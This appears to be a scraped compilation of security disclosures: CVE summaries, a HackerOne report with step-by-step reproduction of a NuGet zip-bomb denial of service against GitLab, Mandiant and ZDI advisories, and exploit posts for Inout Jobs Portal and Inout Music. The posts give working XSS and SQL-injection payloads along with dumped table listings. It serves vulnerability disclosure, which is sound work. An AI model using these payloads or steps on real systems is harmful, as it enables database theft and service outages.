An issue was discovered in the rollback feature of Elastic Endpoint Security for Windows, which could allow unprivileged users to elevate their privileges to those of the LocalSystem account.

CVE-2022-38775: Security issues

SQL Injection vulnerability in function getTableCreationQuery in CreateAddField.php in phpMyAdmin 5.x before 5.2.0 via the tbl_storage_engine or tbl_collation parameters to tbl_create.php.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Assignees

Labels

bug

A problem or regression with an existing feature

CVE-2020-22452: sql injection in  /phpmyadmin/libraries/classesCreateAddField.php · Issue #15898 · phpmyadmin/phpmyadmin

An issue has been discovered in GitLab affecting all versions starting from 12.8 before 15.4.6, all versions starting from 15.5 before 15.5.5, all versions starting from 15.6 before 15.6.1. It was possible to trigger a DoS attack by uploading a malicious nuget package.

Skip to content

Open Issue created Oct 13, 2022 by **GitLab SecurityBot@gitlab-securitybot**Reporter

**Sidekiq background job DoS by uploading malicious Nuget packages**

**HackerOne report #1716296** by luryus on 2022-09-29, assigned to GitLab Team:

Report | Attachments | How To Reproduce

**Report****Summary**

By uploading a crafted malicious Nuget package, an attacker can cause sidekiq to use too much memory and crash (get killed by OOMKiller in Linux). In small (self-hosted) Gitlab environments, where there's only a single Sidekiq node, this will cause some background jobs to fail and their execution will get delayed. For instance, the CI pipelines of other users may get interrupted. In other words, this can cause minor denial of service.

When an user uploads a Nuget package, Gitlab will extract its metadata in a sidekiq background job. This extraction is done by unzipping the .nuspec file from the nupkg package (they are plain old zip archives). The metadata extraction job first checks the nuspec file size in the zip file metadata, to avoid trying to read too large nuspec files. If this check succeeds, the job will continue to extract the nuspec file into memory with no further size checks or limits.

An attacker can freely alter the metadata in the zip file and change the "uncompressed size" attribute of the nuspec file. They might, for example, create a nupkg file with a 20-gigabyte nuspec file, and alter the metadata such that the "uncompressed size" is 256 bytes. When this kind of file would be uploaded to Gitlab, the extraction worker job would try to allocate a 20 gigabyte buffer for extracting the file. In most smaller environments this would lead to sidekiq getting killed.

Because the attacker only needs to upload a single, small (a few megabyte) file to achieve this, it's difficult or impossible to mitigate this with rate limits. The attacker can even upload the same file repeatedly without triggering rate limits (e.g. every 5-10 seconds) to continuously cause crashes.

**Steps to reproduce**

1.  Make sure that Nuget package repository is enabled in the Gitlab instance
2.  Install dotnet sdk locally
3.  Create a personal project in gitlab
4.  Locally, setup a nuget source for pushing to the new project (replace username, access token, gitlab instance url and project id):
    
        dotnet nuget add source -n "gitlab-nuget-test" -u <username> -p <personal_access_token>  "http://<gitlab-url>/api/v4/projects/<project_id>/packages/nuget/index.json" --store-password-in-clear-text   
    
5.  Craft a malicious nuget package, for example with these steps (Linux commands):
    
        # Create a big empty file. Here a 20 gig file is created, but this can be increased too if the sidekiq instance  
        # has a lot of memory  
        touch 20gig.nuspec  
        fallocate -z -l 20GiB 20gig.nuspec  
          
        # Zip it  
        zip -9 20gig.nupkg 20gig.nuspec  
          
        # Run the attached python script to change the "uncompressed size" attributes  
        python3 rewrite_size.py 20gig.nupkg  
    
6.  Upload the crafted package to gitlab
    
        dotnet nuget push -s gitlab-nuget-test --interactive 20gig.nupkg  
    
7.  Observe Sidekiq crashes due to OOMKills in Gitlab server logs.

**Impact**

An attacker can get a sidekiq worker OOMKilled by a simple file upload. This will interrupt any background jobs running on that particular worker. Because the attack is very simple, the attacker can do this often to continuously cause crashes.

This can affect any user in the Gitlab instance because much of Gitlab's functionality relies on sidekiq jobs. For instance, this may cause a CI pipeline to fail and be left in a "pending" state for a long time, if a background job for that pipeline was running when sidekiq crashed.

**What is the current _bug_ behavior?**

Gitlab's Nuget extraction worker trusts the size indicated in the zip file metadata, but does not limit the actual decompressed file size.

Snippet from metadata_extraction_service.rb:

          def nuspec_file_content  
            with_zip_file do |zip_file|  
              entry = zip_file.glob('*.nuspec').first
    
              raise ExtractionError, 'nuspec file not found' unless entry  
              raise ExtractionError, 'nuspec file too big' if entry.size > MAX_FILE_SIZE
    
              entry.get_input_stream.read  
            end  
          end
    
          def with_zip_file(&block)  
            package_file.file.use_open_file do |open_file|  
              zip_file = Zip::File.new(open_file, false, true)  
              yield(zip_file)  
            end  
          end  

With the malicious file, entry.size > MAX_FILE_SIZE return false, because according to the zip file metadata, the nuspec file is only 255 bytes long.

On the next line, no length parameter is given to the read method call. Therefore the entire uncompressed file will be read into a memory buffer. With the example steps above, this would be 20 gigabytes, but the attacker can freely control this and make the file bigger.

**What is the expected _correct_ behavior?**

Gitlab should check the size in the metadata, and limit the amount of data read while unzipping to avoid allocating too much RAM.

**Relevant logs and/or screenshots**

Logs depend on environment. OOMKills are easiest to observe in Linux kernel logs (dmesg).

Here is an example from my own instance, after a Nuget extraction job is started, SidekiqDaemon::MemoryKiller soon notices that Sidekiq is using too much memory, and then Linux kills Sidekiq before the MemoryKiller has a chance to gracefully shut it down (to clarify, SidekiqDaemon::MemoryKiller does not have time to do anything here before Linux OOMKiller jumps in).

    {"severity":"INFO","time":"2022-09-29T06:12:36.295Z","retry":3,"queue":"default","version":0,"queue_namespace":"package_repositories","args":["1392"],"class":"Packages::Nuget::ExtractionWorker","jid":"30a8332b4d36ca1cb0170554","created_at":"2022-09-29T06:12:36.290Z","correlation_id":"01GE3Y080TVGVHFZ6089RPC8HZ","meta.caller_id":"PUT /api/:version/projects/:id/packages/nuget","meta.remote_ip":"172.18.0.1","meta.feature_category":"package_registry","meta.user":"root","meta.client_id":"user/1","meta.root_caller_id":"PUT /api/:version/projects/:id/packages/nuget","worker_data_consistency":"always","idempotency_key":"resque:gitlab:duplicate:default:a7e8f751bc2b7cb679eb178e069da05671c426d4a4374a47ab6762cb738db68e","size_limiter":"validated","enqueued_at":"2022-09-29T06:12:36.291Z","job_size_bytes":6,"pid":765,"message":"Packages::Nuget::ExtractionWorker JID-30a8332b4d36ca1cb0170554: start","job_status":"start","scheduling_latency_s":0.003906}
    
    {"severity":"WARN","time":"2022-09-29T06:12:48.992Z","class":"Gitlab::SidekiqDaemon::MemoryKiller","pid":765,"message":"Sidekiq worker RSS out of range","current_rss":2824928,"soft_limit_rss":2000000,"hard_limit_rss":274877906944,"reason":"current_rss(2824928) \u003e soft_limit_rss(2000000)","running_jobs":[{"jid":"30a8332b4d36ca1cb0170554","worker_class":"Packages::Nuget::ExtractionWorker"}],"retry":0}
    
    {"severity":"WARN","time":"2022-09-29T06:12:52.059Z","class":"Gitlab::SidekiqDaemon::MemoryKiller","pid":765,"message":"Sidekiq worker RSS out of range","current_rss":3650632,"soft_limit_rss":2000000,"hard_limit_rss":274877906944,"reason":"current_rss(3650632) \u003e soft_limit_rss(2000000)","running_jobs":[{"jid":"30a8332b4d36ca1cb0170554","worker_class":"Packages::Nuget::ExtractionWorker"}],"retry":0}
    
    [Thu Sep 29 09:12:52 2022] Out of memory: Killed process 6891 (bundle) total-vm:16266276kB, anon-rss:5457436kB, file-rss:4kB, shmem-rss:792kB, UID:998 pgtables:17812kB oom_score_adj:0
    
    {"severity":"INFO","time":"2022-09-29T06:12:59.788Z","message":"A worker terminated, shutting down the cluster"}  

**Results of GitLab environment info**

Docker installation:

    
    System information  
    System:  
    Proxy:          no  
    Current User:   git  
    Using RVM:      no  
    Ruby Version:   2.7.5p203  
    Gem Version:    3.1.6  
    Bundler Version:2.3.15  
    Rake Version:   13.0.6  
    Redis Version:  6.2.7  
    Sidekiq Version:6.4.2  
    Go Version:     unknown
    
    GitLab information  
    Version:        15.4.0-ee  
    Revision:       abbda55531f  
    Directory:      /opt/gitlab/embedded/service/gitlab-rails  
    DB Adapter:     PostgreSQL  
    DB Version:     13.6  
    URL:            http://gl.lkoskela.com:8929  
    HTTP Clone URL: http://gl.lkoskela.com:8929/some-group/some-project.git  
    SSH Clone URL:  ssh://git@gl.lkoskela.com:2224/some-group/some-project.git  
    Elasticsearch:  no  
    Geo:            no  
    Using LDAP:     no  
    Using Omniauth: yes  
    Omniauth Providers: 
    
    GitLab Shell  
    Version:        14.10.0  
    Repository storage paths:  
    - default:      /var/opt/gitlab/git-data/repositories  
    GitLab Shell path:              /opt/gitlab/embedded/service/gitlab-shell  

**Impact**

An attacker can get a sidekiq worker OOMKilled by a simple file upload. This will interrupt any background jobs running on that particular worker. Because the attack is very simple, the attacker can do this often to continuously cause crashes.

The severity of this depends on the sidekiq setup: with larger and more distributed instances it will of course be smaller as crashes are limited to only a subset of sidekiq instances. In small self-hosted environments though this can have a large impact on the functionality of Gitlab.

This can affect any user in the Gitlab instance because much of Gitlab's functionality relies on sidekiq jobs. Background job execution may get delayed or in some cases they may not get executed at all (if attacker can keep Sidekiq crashing continuously). For instance, this may cause a CI pipeline to fail and be left in a "pending" state for a long time, if a background job for that pipeline was running when sidekiq crashed.

**Attachments**

**Warning:** Attachments received through HackerOne, please exercise caution!

*   rewrite\_size.py

**How To Reproduce**

Please add reproducibility information to this section:

CVE-2022-3478: Sidekiq background job DoS by uploading malicious Nuget packages (#377788) · Issues · GitLab.org / GitLab · GitLab

Qlik NPrinting Designer through 21.14.3.0 creates a Temporary File in a Directory with Insecure Permissions.

**MNDT-2023-0002****Description**

Qlik NPrinting Designer for Windows contains a local privilege escalation vulnerability which affected version 21.14.3.0.

**Impact**

High - Exploiting the vulnerability will give a local unprivileged attacker SYSTEM level privileges.

**Exploitability**

Medium - Any authenticated local user can exploit the vulnerability and an exploit is trivial to produce.

**CVE Reference**

CVE-2021-41988

**Common Weakness Enumeration**

CWE-379: Creation of Temporary File in Directory with Insecure Permissions

**Common Vulnerability Scoring System**

Base Score: 7.8 - Vector: AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

**Technical Details**

The installation of the agent uses the Windows Installer framework and an MSI file is cached in c:\\windows\\installer. An unprivileged user can trigger a repair operation, either by using the Windows Installer API or by running "msiexec.exe /fa c:\\windows\\installer\\\[XXXXX\].msi".

Running a repair operation will trigger a number of file operations in the %TEMP% folder of the user triggering the repair. Some of these operations will be performed from a SYSTEM context (started via the Windows Installer service), including the execution of temporary files.

**Resolution**

The issue was fixed with the May 2022 Service Release 2. Update to address the vulnerability.

**Discovery Credits**

*   Ronnie Salomonsen, Mandiant

**Disclosure Timeline**

*   05-Oct-2021 - Issue reported to Qlik
*   17-Nov-2021 - Issue confirmed by Qlik and a fix scheduled for Nov 11, 2022.
*   11-Nov-2022 - Patched version released by Qlik

**References**

*   Qlik Security Advisory
*   Mitre CVE-2021-41988

CVE-2021-41988: Vulnerability-Disclosures/MNDT-2023-0002.md at master · mandiant/Vulnerability-Disclosures

Qlik QlikView through 12.60.20100.0 creates a Temporary File in a Directory with Insecure Permissions.

**MNDT-2023-0001****Description**

Qlik QlikView for Windows contains a local privilege escalation vulnerability which affected version 12.60.20100.0.

**Impact**

High - Exploiting the vulnerability will give a local unprivileged attacker SYSTEM level privileges.

**Exploitability**

Medium - Any authenticated local user can exploit the vulnerability and an exploit is trivial to produce.

**CVE Reference**

CVE-2021-41989

**Common Weakness Enumeration**

CWE-379: Creation of Temporary File in Directory with Insecure Permissions

**Common Vulnerability Scoring System**

Base Score: 7.8 - Vector: AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

**Technical Details**

The installation of the agent uses the Windows Installer framework and an MSI file is cached in c:\\windows\\installer. An unprivileged user can trigger a repair operation, either by using the Windows Installer API or by running "msiexec.exe /fa c:\\windows\\installer\\\[XXXXX\].msi".

Running a repair operation will trigger a number of file operations in the %TEMP% folder of the user triggering the repair. Some of these operations will be performed from a SYSTEM context (started via the Windows Installer service), including the execution of temporary files.

**Resolution**

The issue was fixed with the May 2022 Initial Release to Service Release 1. Update to address the vulnerability.

**Discovery Credits**

*   Ronnie Salomonsen, Mandiant

**Disclosure Timeline**

*   05-Oct-2021 - Issue reported to Qlik
*   17-Nov-2021 - Issue confirmed by Qlik and a fix scheduled for Oct 5, 2022.
*   05-Oct-2022 - Patched version released by Qlik

**References**

*   Qlik Security Advisory
*   Mitre CVE-2021-41989

CVE-2021-41989: Vulnerability-Disclosures/MNDT-2023-0001.md at master · mandiant/Vulnerability-Disclosures

This vulnerability allows remote attackers to escalate privileges on affected installations of Centreon. Authentication is required to exploit this vulnerability.

The specific flaw exists within the handling of requests to configure poller resources. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to escalate privileges to the level of an administrator. Was ZDI-CAN-18304.

October 3rd, 2022

**Centreon Poller Resource SQL Injection Privilege Escalation Vulnerability****ZDI-22-1326  
ZDI-CAN-18304**

CVE ID

CVE-2022-41142

CVSS SCORE

7.2, (AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)

AFFECTED VENDORS

Centreon  

AFFECTED PRODUCTS

Centreon  

VULNERABILITY DETAILS

This vulnerability allows remote attackers to escalate privileges on affected installations of Centreon. Authentication is required to exploit this vulnerability.

The specific flaw exists within the handling of requests to configure poller resources. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to escalate privileges to the level of an administrator.  

ADDITIONAL DETAILS

Centreon has issued an update to correct this vulnerability. More details can be found at:  
https://github.com/centreon/centreon/security/policy  

DISCLOSURE TIMELINE

*   2022-08-23 - Vulnerability reported to vendor
*   2022-10-03 - Coordinated public release of advisory

CREDIT

Anonymous  

BACK TO ADVISORIES

CVE-2022-41142: ZDI-22-1326

Inout Jobs Portal version 2.2.2 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : inoutscripts.com                                                           ││  Vendor   : Inout Scripts - Nesote Technologies Private Limited                        ││  Software : Inout Jobs Portal 2.2.2                                                    ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpMethod: GETURL parameter 'page' is vulnerable to XSShttps://www.website.com/index.php?page=index%2findexyar11%3cimg%20src%3da%20onerror%3dalert(1)%3ex75a9[-] Done

Inout Jobs Portal 2.2.2 Cross Site Scripting

Inout Jobs Portal version 2.2.2 suffers from a remote SQL injection vulnerability.

┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││                                     C r a C k E r                                    ┌┘  
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                  [ Vulnerability ]                                   ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:  Author   : CraCkEr                                                                    :  
│  Website  : inoutscripts.com                                                           │  
│  Vendor   : Inout Scripts - Nesote Technologies Private Limited                        │  
│  Software : Inout Jobs Portal 2.2.2                                                    │  
│  Vuln Type: SQL Injection                                                              │  
│  Impact   : Database Access                                                            │  
│                                                                                        │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│                                                                                       ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:                                                                                        :  
│ Release Notes:                                                                         │  
│ ═════════════                                                                          │  
│                                                                                        │  
│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │  
│ data and crash the application or make it unavailable, leading to lost revenue and     │  
│ damage to a company reputation                                                         │  
│                                                                                        │  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                                                                      ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   

         CryptoJob (Twitter) twitter.com/CryptozJob

     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                    © CraCkEr 2023                                    ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /index.php?page=jobs/searchresult

Method: POST

POST parameter 'loc_id' is vulnerable to SQLI

+-----------------------------------------------------------+

-----------------------------245625052541747605171577107419  
Content-Disposition: form-data; name="search_query"

web  
-----------------------------245625052541747605171577107419  
Content-Disposition: form-data; name="c_id"

1  
-----------------------------245625052541747605171577107419  
Content-Disposition: form-data; name="loc_id"

1[INJECT-HERE]  
-----------------------------245625052541747605171577107419  
Content-Disposition: form-data; name="serchtype"

simple  
-----------------------------245625052541747605171577107419  
Content-Disposition: form-data; name="c_id"

0  
-----------------------------245625052541747605171577107419

+-----------------------------------------------------------+

[INFO] the back-end DBMS is MySQL  
back-end DBMS: MySQL >= 5.6  
[INFO] fetching tables for database: '*****_jobs_portal'  
Database: *****_jobs_portal  
[53 tables]  
+-----------------------------------------+  
| nesote_inoutscripts_company_ratereview  |  
| nesote_inoutscripts_homepage_banner     |  
| nesote_inoutscripts_users               |  
| nesote_jobportal_admin                  |  
| nesote_jobportal_applied_jobs           |  
| nesote_jobportal_city                   |  
| nesote_jobportal_client_logs            |  
| nesote_jobportal_company_size           |  
| nesote_jobportal_company_type           |  
| nesote_jobportal_companyblock           |  
| nesote_jobportal_contents               |  
| nesote_jobportal_country                |  
| nesote_jobportal_coverletters           |  
| nesote_jobportal_currency               |  
| nesote_jobportal_email_templates        |  
| nesote_jobportal_employer_details       |  
| nesote_jobportal_employer_feedback      |  
| nesote_jobportal_functional_role        |  
| nesote_jobportal_industry               |  
| nesote_jobportal_ip_012023              |  
| nesote_jobportal_ip_022020              |  
| nesote_jobportal_ip_032020              |  
| nesote_jobportal_ip_042020              |  
| nesote_jobportal_ip_082021              |  
| nesote_jobportal_ip_092022              |  
| nesote_jobportal_ip_102022              |  
| nesote_jobportal_ip_112022              |  
| nesote_jobportal_ip_122022              |  
| nesote_jobportal_ipn                    |  
| nesote_jobportal_job_types              |  
| nesote_jobportal_jobs                   |  
| nesote_jobportal_jobseeker_details      |  
| nesote_jobportal_languages              |  
| nesote_jobportal_locations              |  
| nesote_jobportal_messages               |  
| nesote_jobportal_months_messages        |  
| nesote_jobportal_news_and_events        |  
| nesote_jobportal_notifications          |  
| nesote_jobportal_packages               |  
| nesote_jobportal_payment_details        |  
| nesote_jobportal_previous_exp           |  
| nesote_jobportal_qualifications         |  
| nesote_jobportal_resumes                |  
| nesote_jobportal_saved_jobs             |  
| nesote_jobportal_saved_resumes          |  
| nesote_jobportal_seekers_qualifications |  
| nesote_jobportal_sent_jobalerts         |  
| nesote_jobportal_settings               |  
| nesote_jobportal_skills                 |  
| nesote_jobportal_specifications         |  
| nesote_jobportal_states                 |  
| nesote_jobportal_success_story          |  
| nesote_jobportal_themes                 |  
+-----------------------------------------+

[-] Done

Inout Jobs Portal 2.2.2 SQL Injection

Inout Music version 5.1.1 suffers from a remote SQL injection vulnerability.

┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││                                     C r a C k E r                                    ┌┘  
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                  [ Vulnerability ]                                   ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:  Author   : CraCkEr                                                                    :  
│  Website  : inoutscripts.com                                                           │  
│  Vendor   : Inout Scripts - Nesote Technologies Private Limited                        │  
│  Software : Inout Music 5.1.1                                                          │  
│  Vuln Type: SQL Injection                                                              │  
│  Impact   : Database Access                                                            │  
│                                                                                        │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│                                                                                       ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:                                                                                        :  
│ Release Notes:                                                                         │  
│ ═════════════                                                                          │  
│                                                                                        │  
│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │  
│ data and crash the application or make it unavailable, leading to lost revenue and     │  
│ damage to a company reputation                                                         │  
│                                                                                        │  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                                                                      ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   

         CryptoJob (Twitter) twitter.com/CryptozJob

     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                    © CraCkEr 2023                                    ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /index.php?page=explore/search

Method: POST

POST parameter 'title' is vulnerable to SQLI

---  
Parameter: title (POST)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
    Payload: title=1' AND (SELECT 9844 FROM (SELECT(SLEEP(5)))scaa) AND 'tLOV'='tLOV  
---

POST parameter 'genre' is vulnerable to SQLI

---  
Parameter: genre (POST)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
    Payload: title=1&type=videoalbum&genre=1') AND (SELECT 3533 FROM (SELECT(SLEEP(5)))ENgP) AND ('MnKg'='MnKg&country=10  
---

POST parameter 'country' is vulnerable to SQLI

---  
Parameter: country (POST)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
    Payload: title=1&type=videoalbum&genre=1&country=10 AND (SELECT 4811 FROM (SELECT(SLEEP(5)))nDdo)  
---

+-----------------------------------------------------------+

POST /index.php?page=explore/search HTTP/2

-----------------------------116235583720082436942508111905  
Content-Disposition: form-data; name="title"

love[Inject-HERE]  
-----------------------------116235583720082436942508111905  
Content-Disposition: form-data; name="type"

audioalbum  
-----------------------------116235583720082436942508111905  
Content-Disposition: form-data; name="genre"

1[Inject-HERE]  
-----------------------------116235583720082436942508111905  
Content-Disposition: form-data; name="country"

3[Inject-HERE]  
-----------------------------116235583720082436942508111905--

+-----------------------------------------------------------+

[-] Done

Inout Music 5.1.1 SQL Injection

Ubuntu Security Notice 5823-2 - USN-5823-1 fixed a vulnerability in MySQL. This update provides the corresponding update for Ubuntu 16.04 ESM. Multiple security issues were discovered in MySQL and this update includes new upstream MySQL versions to fix these issues. MySQL has been updated to MySQL 5.7.41.

=========================================================================  
Ubuntu Security Notice USN-5823-2  
January 24, 2023

mysql-5.7 vulnerability  
=========================================================================  
A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.04 ESM

Summary:

Several security issues were fixed in MySQL.

Software Description:  
- mysql-5.7: MySQL database

Details:

USN-5823-1 fixed a vulnerability in MySQL. This update provides  
the corresponding update for Ubuntu 16.04 ESM.

Original advisory details:

 Multiple security issues were discovered in MySQL and this update includes  
 new upstream MySQL versions to fix these issues.

 MySQL has been updated to MySQL 5.7.41.

 In addition to security fixes, the updated packages contain bug fixes, new  
 features, and possibly incompatible changes.

 Please see the following for more information:

 https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-41.html  
 https://www.oracle.com/security-alerts/cpujan2023.html

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 16.04 ESM:  
  mysql-server-5.7                5.7.41-0ubuntu0.16.04.1+esm1

This update uses a new upstream release, which includes additional bug  
fixes. In general, a standard system update will make all the necessary  
changes.

References:  
  https://ubuntu.com/security/notices/USN-5823-2  
  https://ubuntu.com/security/notices/USN-5823-1  
  CVE-2023-21840

Tag

#sql